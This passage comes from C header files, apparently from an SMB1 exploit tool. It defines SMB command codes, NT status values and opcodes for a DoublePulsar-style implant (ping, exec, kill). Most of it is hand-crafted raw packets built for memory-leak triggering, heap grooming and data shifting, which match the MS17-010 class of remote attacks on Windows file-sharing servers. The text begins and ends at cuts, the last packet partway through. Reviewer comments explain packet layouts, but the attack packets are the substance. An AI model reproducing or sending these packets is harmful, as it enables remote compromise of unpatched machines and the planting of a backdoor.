 * "private". __LPREFIX is an MSVC intrinsic that widens a narrow string
 * literal, so fmt must be a literal; that also means a runtime-supplied
 * format string cannot reach fwprintf_s through these macros. A bare
 * __VA_ARGS__ after "fmt, ..." needs at least one extra argument on compilers
 * without MSVC's empty-argument extension.
 */
#define errmsg(func, line, err) \
    (fwprintf_s(stderr, __LPREFIX("[-] function %S failed on line %u with error 0x%08X\n"), func, MAKEUNSIGNED(line), MAKEUNSIGNED(err)))
#define _dbgprint(fmt, ...) \
    (fwprintf_s(stdout, __LPREFIX(fmt), __VA_ARGS__))
#define dbgprint(fmt, ...) \
    (fwprintf_s(stderr, __LPREFIX(fmt), __VA_ARGS__))
108 |
109 |
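/* Project-local failure status; the same value as the SDK's STATUS_UNSUCCESSFUL. */
#define STATUS_FAIL 0xC0000001

/*
 * SMB1 command codes for SMB_HEADER.Command (MS-CIFS). The hand-built
 * requests in smbpacketstrings.h carry the matching byte at offset 8, e.g.
 * 0x72 in NEGOTIATE_PACKET and 0x75 in TREE_CONNECT_ANDX_PACKET (0x75 is the
 * ANDX form of tree connect, despite the shorter name used here).
 * SMB_COM_TRANS2_SECONDARY was previously defined with no value, so any use
 * in an expression failed to compile (or silently vanished in a
 * preprocessor-only context); 0x33 is the MS-CIFS value
 * (SMB_COM_TRANSACTION2_SECONDARY), one above SMB_COM_TRANS2 just as
 * SMB_COM_TRANS_SECONDARY is one above SMB_COM_TRANS.
 */
#define SMB_COM_NEGOTIATE 0x72
#define SMB_COM_SESSION_SETUP_ANDX 0x73
#define SMB_COM_TREE_CONNECT 0x75
#define SMB_COM_TRANS 0x25
#define SMB_COM_TRANS_SECONDARY 0x26
#define SMB_COM_TRANS2 0x32
#define SMB_COM_TRANS2_SECONDARY 0x33
#define SMB_COM_NT_TRANS 0xa0
#define SMB_COM_NT_CREATE_ANDX 0xa2
#define SMB_COM_WRITE_ANDX 0x2f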
122 |
/*
 * Byte offsets within a raw packet buffer, NetBIOS session header included.
 * Only the first two carry the U suffix; the others are signed int constants,
 * so comparing them against DWORD lengths mixes signedness -- be explicit
 * about the cast when bounds-checking.
 */
#define NETBIOS_SIZE_OFFSET 2U          /* 2-byte big-endian length field (e.g. "\x00\x85" in NEGOTIATE_PACKET) */
#define SMB_HEADER_OFFSET 4U            /* SMB_HEADER begins after the 4-byte NetBIOS header */
#define SMB_PARAM_OFFSET 36             /* SMB_HEADER_OFFSET + sizeof(SMB_HEADER) (4 + 32): first byte past the header */
#define TREE_CONNECT_ANDX_UNC_OFFSET 48 /* where the UTF-16 UNC path starts in TREE_CONNECT_ANDX_PACKET */
#define TREE_CONNECT_ANDX_SVC "?????"   /* service string appended after the UNC path */
#define TREE_CONNECT_ANDX_SVC_SIZE 6    /* including the terminating NUL */
#define TREE_CONNECT_ANDX_SVC_LEN 5     /* excluding it */
130 |
131 | #define DOPU_PING_OPCODE 0x23
132 | #define DOPU_EXEC_OPCODE 0xC8
133 | #define DOPU_KILL_OPCODE 0x77
134 |
135 | #define DOPU_ERROR_SUCCESS 0x10
136 | #define DOPU_ERROR_ALLOCATION 0x30
137 | #define DOPU_ERROR_PARAMETERS 0x20
138 |
/*
 * Status values compared against SMB_HEADER.Status.NtStatus (smb.h). The
 * three values after SUCCESS (0x00010002, 0x00050002, 0x005b0002) are NOT
 * NTSTATUS codes: read through the DosError view of that union on a
 * little-endian host they are ErrorClass 0x02 (ERRSRV) in the low byte with
 * the Error code (0x0001, 0x0005, 0x005b) in the high word -- the legacy
 * DOS-error encoding seen as one DWORD. Everything from NOT_IMPLEMENTED down
 * is a genuine NTSTATUS (0xC... severity-error prefix). A parser must decide
 * which view applies before comparing, or a DOS-encoded error will never
 * match an NT_STATUS_* constant and vice versa.
 */
#define NT_STATUS_SUCCESS 0x00000000
#define NT_STATUS_INVALID_SMB 0x00010002      /* DOS encoding: class 0x02, code 0x0001 */
#define NT_STATUS_SMB_BAD_TID 0x00050002      /* DOS encoding: class 0x02, code 0x0005 */
#define NT_STATUS_SMB_BAD_UID 0x005b0002      /* DOS encoding: class 0x02, code 0x005b */
#define NT_STATUS_NOT_IMPLEMENTED 0xC0000002
#define NT_STATUS_INVALID_DEVICE_REQUEST 0xC0000010
#define NT_STATUS_NO_SUCH_DEVICE 0xC000000e
#define NT_STATUS_NO_SUCH_FILE 0xC000000f
#define NT_STATUS_MORE_PROCESSING_REQUIRED 0xC0000016
#define NT_STATUS_INVALID_LOCK_SEQUENCE 0xC000001e
#define NT_STATUS_INVALID_VIEW_SIZE 0xC000001f
#define NT_STATUS_ALREADY_COMMITTED 0xC0000021
#define NT_STATUS_ACCESS_DENIED 0xC0000022
#define NT_STATUS_OBJECT_NAME_NOT_FOUND 0xC0000034
#define NT_STATUS_OBJECT_NAME_COLLISION 0xC0000035
#define NT_STATUS_OBJECT_PATH_INVALID 0xC0000039
#define NT_STATUS_OBJECT_PATH_NOT_FOUND 0xC000003a
#define NT_STATUS_OBJECT_PATH_SYNTAX_BAD 0xC000003b
#define NT_STATUS_PORT_CONNECTION_REFUSED 0xC0000041
#define NT_STATUS_THREAD_IS_TERMINATING 0xC000004b
#define NT_STATUS_DELETE_PENDING 0xC0000056
#define NT_STATUS_PRIVILEGE_NOT_HELD 0xC0000061
#define NT_STATUS_LOGON_FAILURE 0xC000006D
#define NT_STATUS_DFS_EXIT_PATH_FOUND 0xC000009b
#define NT_STATUS_MEDIA_WRITE_PROTECTED 0xC00000a2
#define NT_STATUS_ILLEGAL_FUNCTION 0xC00000af
#define NT_STATUS_FILE_IS_A_DIRECTORY 0xC00000BA
#define NT_STATUS_FILE_RENAMED 0xC00000D5
#define NT_STATUS_REDIRECTOR_NOT_STARTED 0xC00000fb
#define NT_STATUS_DIRECTORY_NOT_EMPTY 0xC0000101
#define NT_STATUS_PROCESS_IS_TERMINATING 0xC000010a
#define NT_STATUS_TOO_MANY_OPENED_FILES 0xC000011f
#define NT_STATUS_CANNOT_DELETE 0xC0000121
#define NT_STATUS_FILE_DELETED 0xC0000123
#define NT_STATUS_INSUFF_SERVER_RESOURCES 0xC0000205
174 |
175 |
--------------------------------------------------------------------------------
/smbpacketstrings.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #define NEGOTIATE_PACKET "\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc0" \
3 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" \
4 | "\x00\x00\x40\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f" \
5 | "\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02" \
6 | "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f" \
7 | "\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70" \
8 | "\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30" \
9 | "\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54" \
10 | "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"
11 |
12 | #define NEGOTIATE_PACKET_SIZE 137
13 |
14 |
15 | #define SESSION_SETUP_ANDX_PACKET "\x00\x00\x00\x88\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc0" \
16 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" \
17 | "\x00\x00\x40\x00\x0d\xff\x00\x88\x00\x04\x11\x0a\x00\x00\x00\x00" \
18 | "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x4b" \
19 | "\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00" \
20 | "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00" \
21 | "\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6e\x00" \
22 | "\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00" \
23 | "\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00"
24 |
25 | #define SESSION_SETUP_ANDX_PACKET_SIZE 140
26 |
27 |
28 | #define TREE_CONNECT_ANDX_PACKET "\x00\x00\x00\x5a\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc0" \
29 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" \
30 | "\x00\x08\x40\x00\x04\xff\x00\x5a\x00\x08\x00\x01\x00\x2f\x00\x00" \
31 | "\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00\x2e\x00\x32\x00\x33\x00" \
32 | "\x2e\x00\x33\x00\x33\x00\x2e\x00\x31\x00\x30\x00\x5c\x00\x49\x00" \
33 | "\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f\x3f\x00"
34 |
35 | #define TREE_CONNECT_ANDX_PACKET_SIZE 94
36 |
37 |
38 | #define NT_CREATE_ANDX_PACKET "\x00\x00\x00\x62\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x18\x07\xc0" \
39 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
40 | "\x00\x08\x40\x00\x18\xff\x00\x62\x00\x00\x0c\x00\x16\x00\x00\x00" \
41 | "\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
42 | "\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" \
43 | "\x02\x00\x00\x00\x03\x0f\x00\x00\x6c\x00\x73\x00\x61\x00\x72\x00" \
44 | "\x70\x00\x63\x00\x00\x00"
45 |
46 |
47 | #define NT_CREATE_ANDX_PACKET_SIZE 102
48 |
49 |
50 | #define TRANS_DCERPC_BIND_PACKET "\x00\x00\x00\x9c\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
51 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
52 | "\x00\x08\x40\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x08" \
53 | "\x00\xe8\x03\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02" \
54 | "\x00\x26\x00\x00\x40\x59\x00\x00\x5c\x00\x50\x00\x49\x00\x50\x00" \
55 | "\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00\x0b\x03\x10\x00\x00\x00" \
56 | "\x48\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00" \
57 | "\x01\x00\x00\x00\x00\x00\x01\x00\x78\x57\x34\x12\x34\x12\xcd\xab" \
58 | "\xef\x00\x01\x23\x45\x67\x89\xab\x00\x00\x00\x00\x04\x5d\x88\x8a" \
59 | "\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00"
60 |
61 |
62 | #define TRANS_DCERPC_BIND_PACKET_SIZE 160
63 |
64 |
65 | #define WRITE_ANDX_LSARPC_GET_USERNAME_PACKET "\x00\x00\x02\x98\xff\x53\x4d\x42\x2f\x00\x00\x00\x00\x18\x07\xc0" \
66 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
67 | "\x00\x08\x40\x00\x0e\xff\x00\x40\x00\x00\x40\x00\x00\x00\x00\xff" \
68 | "\xff\xff\xff\x08\x00\x58\x02\x00\x00\x58\x02\x40\x00\x00\x00\x00" \
69 | "\x00\x59\x02\x00\x05\x00\x00\x03\x10\x00\x00\x00\x58\x02\x00\x00" \
70 | "\x01\x00\x00\x00\x40\x02\x00\x00\x00\x00\x2d\x00\x48\x86\x0e\x00" \
71 | "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
72 | "\x78\x96\x31\x00\x10\x02\x10\x02\x68\xf5\x11\x00\x08\x01\x00\x00" \
73 | "\x00\x00\x00\x00\x08\x01\x00\x00\xd9\x38\xed\x8e\x3d\x8d\xc1\x85" \
74 | "\x3d\x1f\xa1\x55\xe4\xac\x1c\x7b\xbe\x0a\xd8\x09\x0d\x88\x14\x39" \
75 | "\xaa\x88\x7a\x2b\x71\x3f\x79\xe2\xe6\x02\x00\x39\xf6\x0a\xdd\xec" \
76 | "\x7e\x0d\x83\x62\x8b\xa2\x83\x63\xd9\xd1\x7e\x5a\xaf\xb4\xe1\x52" \
77 | "\x84\x9a\x21\x53\x8d\x86\xd0\x45\xaa\x85\x4c\x0b\xc3\xaf\x4e\xee" \
78 | "\x1f\x4c\x27\x0a\xb9\xf6\xec\xeb\x16\x30\x5f\xf0\xae\x4d\xd7\xac" \
79 | "\x6e\x0e\xf8\xeb\x50\xf1\x7b\x76\xa5\x83\xcd\x4f\x01\xa6\xd5\x87" \
80 | "\x69\x3e\xa4\x4b\xb7\x13\x55\x61\xc9\x6e\xea\xb8\x7d\x3f\x6a\x27" \
81 | "\x04\x4a\x0a\x15\x94\x2f\xaa\x27\xfe\xc4\x68\x9a\x36\xa2\x9b\x7e" \
82 | "\x4d\x50\xf7\x6a\xf2\xef\x1f\xdc\xec\xd7\x77\xeb\xb3\x02\x78\x6c" \
83 | "\x8d\xbe\x49\x3c\x5c\x78\xf2\xd4\x85\x1a\xe8\xc6\x0d\xdc\x32\x5e" \
84 | "\x65\xf4\x08\xf5\x01\x05\x16\x3b\x25\xc0\x47\x09\x10\x94\x45\xec" \
85 | "\xf5\xe2\x8e\x11\xd2\x8d\x55\xbf\xb2\x5e\x02\xf8\x5b\x17\x92\x7c" \
86 | "\xf3\xa6\xa3\xc2\xa2\x5b\x6e\x25\xbd\x87\x82\xda\x7e\x7b\x80\xdf" \
87 | "\xd2\x34\x9c\x8e\x48\xb6\x37\xf3\xa3\x72\x51\x9c\x1d\x9e\x1d\xf5" \
88 | "\xe0\xea\x7f\xef\xbd\x7b\xc0\x09\xaa\x92\x37\x6e\x0d\xc6\x3d\x48" \
89 | "\x63\x3b\x1d\xf4\x3a\xc3\x6a\x44\x21\x3f\x5b\x65\x77\x42\x9b\xae" \
90 | "\xbd\x4a\x3a\xe1\x5f\x7b\x10\x1d\x85\x4d\x60\x1c\xf6\x0a\xf9\xed" \
91 | "\x8c\x88\xa4\xce\x4b\x0c\x22\x4b\x9b\xb6\x8a\x4f\xb6\x5e\x3e\x54" \
92 | "\xc5\x5a\x5a\x47\xc0\xf7\xc9\x60\x94\x2f\xda\x83\x99\x67\x99\x61" \
93 | "\xdb\xb2\xa9\xed\x43\x73\x01\x6c\x29\xd0\x32\x9f\x4f\xd5\x9e\x5c" \
94 | "\xd9\xb5\x4d\x16\x3d\x13\xbe\x99\xc0\xb3\x70\x8d\x7e\x82\x6a\xfb" \
95 | "\x85\x57\x8f\x6c\x17\x5f\x0c\xd1\x8a\x90\x91\xdf\xdd\x10\xbd\x02" \
96 | "\x81\xfe\x69\x8d\x5d\x7b\x2b\x57\x9f\x60\xd1\x69\x57\x89\x21\xde" \
97 | "\x69\x1f\xa1\xab\xe0\xc1\xb3\x6d\x26\xfd\xca\xe4\x26\x02\x04\x4b" \
98 | "\xf1\xe1\xed\x30\xd0\x64\xb2\xf1\x6c\xc3\x94\x8e\xfb\x34\xdc\xf1" \
99 | "\x0b\xba\x10\x56\xe1\x10\xcc\xfc\x0c\x2b\xe8\xc9\x17\x25\x44\x04" \
100 | "\x01\x11\xfd\xcd\x6b\x8a\x5e\x85\x09\x71\x3b\xbc\x6c\xc0\x1e\xe5" \
101 | "\x9a\xdf\xf6\x5c\x86\x4e\x98\xff\xf3\x31\xe1\xf3\xc2\x7c\xb5\xc2" \
102 | "\x34\x4a\xa9\x7c\x2d\x32\xa2\xfa\x03\x07\x2d\xfc\xd2\xf4\xd7\x34" \
103 | "\xea\x4c\x55\xf9\x5f\x02\xbc\xc2\x3d\x31\x90\x0d\x66\x90\xfa\xe2" \
104 | "\xb1\x4e\xe7\x98\x3d\x27\x5b\x00\x8e\x2b\xba\x9d\x7d\x1e\x5a\x1e" \
105 | "\x7a\xca\x18\xaf\x29\x3d\x49\x58\xef\x54\xb9\x0a\x67\x75\x1a\x88" \
106 | "\x4c\xea\x94\xc9\xe9\xbe\xc9\x0c\x00\x00\x00\x00"
107 |
108 |
109 | #define WRITE_ANDX_LSARPC_GET_USERNAME_PACKET_SIZE 668
110 |
111 |
112 | #define TRANS_FIRST_LEAK_TRIGGER_PACKET "\x00\x00\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
113 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
114 | "\x00\x08\x40\x00\x10\x00\x00\x00\x00\x00\x54\x01\x00\x00\x00\x00" \
115 | "\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
116 | "\x00\x23\x00\x00\x40\x00\x00"
117 |
118 |
119 | #define TRANS_FIRST_LEAK_TRIGGER_PACKET_SIZE 71
120 |
121 | #define TRANS_GROOM_PACKET_TYPE_ONE "\x00\x00\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
122 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
123 | "\x00\x08\x41\x00\x10\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00" \
124 | "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
125 | "\x00\x36\x00\x00\x40\x00\x00"
126 |
127 | #define TRANS_GROOM_PACKET_TYPE_ONE_SIZE 71
128 |
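/*
 * Three SMB_COM_TRANSACTION (0x25) requests concatenated into one send.
 * Each message is 71 bytes (NetBIOS length 0x43 + 4-byte session header);
 * the NetBIOS headers sit at offsets 0, 71 and 142, hence *_SIZE == 3 * 71.
 * Visible header fields: TID 0x0800, UID 0x0800 in every message; the middle
 * message uses PID 0x280b / MID 0x4000, the outer two PID 0x280c with MIDs
 * 0x4b/0x4c (TYPE_ONE), 0x4d/0x4e (NUMBER_TWO), 0x4f/0x50 (NUMBER_THREE).
 * Setup words are 0x0023 (TRANS_PEEK_NMPIPE) with FID 0x4000.
 *
 * NOTE(review): TID/UID/FID are baked into the literal. They are only valid
 * if the target actually handed back those values during TREE_CONNECT /
 * SESSION_SETUP / NT_CREATE; a sender that does not patch them at runtime
 * will get the messages rejected.
 *
 * The *_SIZE constants are hand-maintained, so each one is pinned to the
 * literal with a static_assert: a mismatch would make send() truncate the
 * packet or read past the end of the literal.
 */
#define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE "\x00\x00\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x4b\x00\x10\x00\x00\x01\x00\x00\x54\x01\x00\x00\x00\x00" \
"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
"\x00\x23\x00\x00\x40\x00\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x25" \
"\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x08\x0b\x28\x00\x08\x00\x40\x10\x00\x00\x00\x54" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x02\x00\x36\x00\x00\x40\x00\x00\x00\x00" \
"\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08" \
"\x4c\x00\x10\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x01" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x36" \
"\x00\x00\x40\x00\x00"

#define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_SIZE 213
static_assert(sizeof(TRANS_MULTI_REQUEST_PACKET_TYPE_ONE) - 1 == TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_SIZE,
              "TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_SIZE does not match the literal");


/* Same layout as TYPE_ONE; differs only in MIDs (0x4d/0x4e) and middle PID 0x280a. */
#define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_TWO "\x00\x00\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x4d\x00\x10\x00\x00\x01\x00\x00\x54\x01\x00\x00\x00\x00" \
"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
"\x00\x23\x00\x00\x40\x00\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x25" \
"\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x08\x0a\x28\x00\x08\x00\x40\x10\x00\x00\x00\x54" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x02\x00\x36\x00\x00\x40\x00\x00\x00\x00" \
"\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08" \
"\x4e\x00\x10\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x01" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x36" \
"\x00\x00\x40\x00\x00"

#define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_TWO_SIZE 213
static_assert(sizeof(TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_TWO) - 1 == TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_TWO_SIZE,
              "TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_TWO_SIZE does not match the literal");

/* Same layout as TYPE_ONE; differs only in MIDs (0x4f/0x50) and middle PID 0x2809. */
#define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_THREE "\x00\x00\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x4f\x00\x10\x00\x00\x01\x00\x00\x54\x01\x00\x00\x00\x00" \
"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
"\x00\x23\x00\x00\x40\x00\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x25" \
"\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x08\x09\x28\x00\x08\x00\x40\x10\x00\x00\x00\x54" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x02\x00\x36\x00\x00\x40\x00\x00\x00\x00" \
"\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08" \
"\x50\x00\x10\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x01" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x36" \
"\x00\x00\x40\x00\x00"

#define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_THREE_SIZE 213
static_assert(sizeof(TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_THREE) - 1 == TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_THREE_SIZE,
              "TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_THREE_SIZE does not match the literal");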
182 |
183 |
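/*
 * SMB_COM_TRANSACTION (0x25), MID 0x51, PID 0x280c, TID/UID 0x0800, SetupCount 0.
 * Announces TotalDataCount 0x40 but carries no parameter or data bytes
 * (ParameterCount/DataCount/ByteCount are all 0), so the transaction is left
 * open for TRANSACTION_SECONDARY messages to fill in.
 * 67 bytes = NetBIOS length 0x3f + 4.
 */
#define TRANS_GROOM_PACKET_TYPE_TWO "\x00\x00\x00\x3f\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x51\x00\x0e\x00\x00\x40\x00\x40\x09\x00\x00\x00\x00\x00" \
"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00"

#define TRANS_GROOM_PACKET_TYPE_TWO_SIZE 67
static_assert(sizeof(TRANS_GROOM_PACKET_TYPE_TWO) - 1 == TRANS_GROOM_PACKET_TYPE_TWO_SIZE,
              "TRANS_GROOM_PACKET_TYPE_TWO_SIZE does not match the literal");


/*
 * SMB_COM_TRANSACTION_SECONDARY (0x26) addressed to MID 0x4b (the first MID
 * used by TRANS_MULTI_REQUEST_PACKET_TYPE_ONE): DataCount 1 at DataOffset
 * 0x42, ByteCount 16.  71 bytes = NetBIOS length 0x43 + 4.
 */
#define TRANS_SECONDARY_LEAK_TWO_TRIGGER_PACKET "\x00\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x4b\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" \
"\x00\x42\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x11"

#define TRANS_SECONDARY_LEAK_TWO_TRIGGER_PACKET_SIZE 71
static_assert(sizeof(TRANS_SECONDARY_LEAK_TWO_TRIGGER_PACKET) - 1 == TRANS_SECONDARY_LEAK_TWO_TRIGGER_PACKET_SIZE,
              "TRANS_SECONDARY_LEAK_TWO_TRIGGER_PACKET_SIZE does not match the literal");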
200 |
201 |
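/*
 * SMB_COM_WRITE_ANDX (0x2f), PID 0x280b, MID 0x4000, FID 0x4000.
 * DataLength / ByteCount are 0x0200, i.e. 512 bytes of opaque payload follow
 * the 64-byte header part; the payload bytes are not interpreted by anything
 * in this header (they look random, presumably filler -- TODO confirm).
 * 576 bytes = NetBIOS length 0x023c + 4.
 */
#define WRITE_ANDX_INDATA_SHIFT_PACKET "\x00\x00\x02\x3c\xff\x53\x4d\x42\x2f\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0b\x28" \
"\x00\x08\x00\x40\x0c\xff\x00\x3c\x00\x00\x40\x00\x00\x00\x00\xff" \
"\xff\xff\xff\x04\x00\x00\xfe\x00\x00\x00\x02\x3b\x00\x00\x02\x00" \
"\x46\xc5\x98\xb4\x9b\xba\xcd\x08\x28\x51\xc4\x88\xa1\x7e\xef\x76" \
"\xfb\xa7\xd3\x99\x5e\x6a\xda\x6e\xa9\xaf\x35\x1b\xae\x96\x3c\xf9" \
"\xd1\x3e\x31\xde\x2e\xf5\xd3\x12\xe8\xd9\xa0\x1b\xe2\x68\x3a\x3c" \
"\x66\x17\xcb\xde\xfd\x6a\xd8\xbc\x1b\x9e\x67\x0c\xbd\x65\xe7\x72" \
"\xaa\xc6\xb3\x0d\x7c\xa0\xa9\x52\x19\xdc\xb3\x16\xc9\xd4\xaf\x7c" \
"\x85\xff\x92\x13\xb7\x59\x48\xf7\xfe\xa5\x18\x2b\x3b\xfa\x0f\x08" \
"\x72\xb9\x4c\xf0\xb7\x62\x97\x2c\xcc\x5d\x30\x22\x99\x33\x37\xb3" \
"\x21\x4d\x9c\x1a\x23\xb2\xf9\xf4\x09\xdc\x3f\xd7\x51\x1a\xa5\x2b" \
"\x14\x98\xb6\x9e\xdb\x8b\xf0\xed\x5e\x8a\xd0\x4e\x5f\xa0\xc7\x48" \
"\x45\x18\xe6\x3f\xa0\x99\xbf\x76\x3c\x84\x59\xd3\xee\x33\x9e\x36" \
"\xc1\x0f\x31\x97\xab\x13\x0b\xc9\x74\xb8\xd7\x15\xf1\xdb\x5a\x89" \
"\x48\x9f\xf4\x36\x55\xd9\x79\x22\xde\x06\x6e\x4d\xcb\x5a\xfb\x6a" \
"\xf2\xef\x84\xc1\xb1\x98\x4c\xdb\xf7\x62\x0d\x57\xeb\x4d\xf3\xac" \
"\xc9\x48\xd1\x18\x30\xe6\x0a\x8b\x80\xf1\x0b\xda\x6b\x4d\xc3\xf3" \
"\x6a\x34\x01\x6c\x3f\x63\x1a\x28\x1d\x2d\xc6\x5e\xb2\x0a\x9e\xcf" \
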